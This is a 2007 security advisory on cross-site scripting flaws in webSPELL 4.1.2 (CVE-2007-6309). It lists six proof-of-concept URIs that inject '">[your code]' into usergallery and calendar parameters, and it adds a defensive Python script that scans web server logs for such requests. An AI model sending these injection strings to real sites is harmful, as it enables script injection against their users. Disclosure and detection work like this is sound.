| Field | Value |
|---|---|
| Title | webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities |
| Published | 2007-12-10 12:00AM |
| Updated | 2008-01-03 02:10PM |
| Class | Input Validation Error |
| CVE | CVE-2007-6309 |
| Remote | Yes |
| Local | No |
| Credit | Brainhead is credited with the discovery of these vulnerabilities. |
| Vulnerable | webSPELL webSPELL 4.1.2 |
| Not Vulnerable | |

Code: Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI. The following proof-of-concept URIs are available:

http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
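To check whether requests of the shape listed above reached an installation, its web server access log can be scanned for the affected parameters. This is an added example, not part of the original advisory; it assumes the listed parameters normally carry plain integers, and the log lines and the `/webspell/` path are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in the advisory's URIs, keyed by the (site, action) pair.
WATCHED = {
    ("usergallery", "upload"): {"galleryID"},
    ("calendar", "announce"): {"upID", "tag", "month", "userID", "year"},
}
# Assumption (not stated in the advisory): legitimate values are integers.
NUMERIC = re.compile(r"\d+")
# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(uri):
    """Return sorted names of watched parameters with a non-integer value."""
    query = parse_qs(urlsplit(uri).query)  # parse_qs percent-decodes values
    site = query.get("site", [""])[0]
    action = query.get("action", [""])[0]
    watched = WATCHED.get((site, action), set())
    return sorted({
        name for name in watched
        for value in query.get(name, [])
        if not NUMERIC.fullmatch(value)
    })

def scan_log(lines):
    """Return (client, uri, parameter names) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, uri = match.groups()
        flagged = suspicious_params(uri)
        if flagged:
            hits.append((client, uri, flagged))
    return hits

# Constructed sample log lines (documentation address ranges, made-up path).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2007:09:14:02 +0000] "GET /webspell/index.php?site=calendar&action=announce&upID=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Dec/2007:09:15:40 +0000] "GET /webspell/index.php?site=calendar&action=announce&month=%22%3Emarker&year=2007 HTTP/1.1" 200 5301',
    '198.51.100.7 - - [10/Dec/2007:09:15:44 +0000] "GET /webspell/index.php?site=usergallery&action=upload&galleryID=%22%3Emarker HTTP/1.1" 200 4988',
    '203.0.113.5 - - [10/Dec/2007:09:16:01 +0000] "GET /webspell/index.php?site=news&galleryID=abc HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for client, uri, flagged in scan_log(SAMPLE_LOG):
        print(client, flagged, uri)
```

A flagged line shows that a non-integer value was sent, not that script ran in a browser; the response body and the referring page still need to be reviewed.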
Copyright 2007,
SecurityDot
Sat, 22 Nov 2008 05:17:54 +0000